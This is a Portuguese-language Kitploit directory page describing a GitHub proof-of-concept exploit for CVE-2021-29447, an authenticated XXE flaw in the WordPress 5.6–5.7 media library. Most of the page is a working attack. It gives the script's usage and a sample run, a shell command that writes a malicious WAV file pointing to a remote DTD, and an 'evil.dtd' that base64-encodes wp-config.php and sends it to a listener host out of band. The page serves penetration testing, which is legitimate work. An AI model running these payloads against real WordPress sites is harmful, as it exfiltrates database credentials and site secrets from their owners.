Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2021-29447 — Exploit de prova de conceito para CVE-2021-29447: XXE autenticado na biblioteca de mídia do WordPress 5.6-5.7. Gera arquivo WAV malicioso e DTD para ler arquivos arbitrários do servidor via exfiltração de dados fora de banda. | Kitploit
Ferramentas/GitHubGitHub/g01d3nw01f/cve-2021-29447
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de Penetração
GitHubg01d3nw01f/cve-2021-29447

CVE-2021-29447

Exploit de prova de conceito para CVE-2021-29447: XXE autenticado na biblioteca de mídia do WordPress 5.6-5.7. Gera arquivo WAV malicioso e DTD para ler arquivos arbitrários do servidor via exfiltração de dados fora de banda.

Ver Repositório
há 3 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2021-29447 WordPress 5.6-5.7 - XXE Autenticado (Autor+)

https://blog.wpsec.com/wordpress-xxe-in-media-library-cve-2021-29447/

uso:

-l LHOST exemplo: 127.0.0.1 -n NOME exemplo: payload.wav -dn NOME_DTD exemplo: evil.dtd -r READ exemplo: ../wp-config.php

evil-wav-dtd-xxe.py: erro: os seguintes argumentos são obrigatórios: -l/--lhost, -n/--name, -dn/--dtd, -r/--read

exemplo de execução do script:

./evil-wav-dtd-xxe.py -l 127.0.0.1 -n payload.wav -dn evil.dtd -r "../wp-config.php"

root@kitploit:~
[*]Created: evil.dtd
-------------------------------------------------------------------------
-- below commands run in terminal directory: generate the .wav file   --
-------------------------------------------------------------------------
echo -en 'RIFF\x85\x00\x00\x00WAVEiXML\x79\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://127.0.0.1/evil.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav

evil.dtd (gerado automaticamente)

root@kitploit:~
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=../wp-config.php">
<!ENTITY % init "<!ENTITY &#x25; trick SYSTEM 'http://127.0.0.1/?p=%file;'>" >
Baixar ferramenta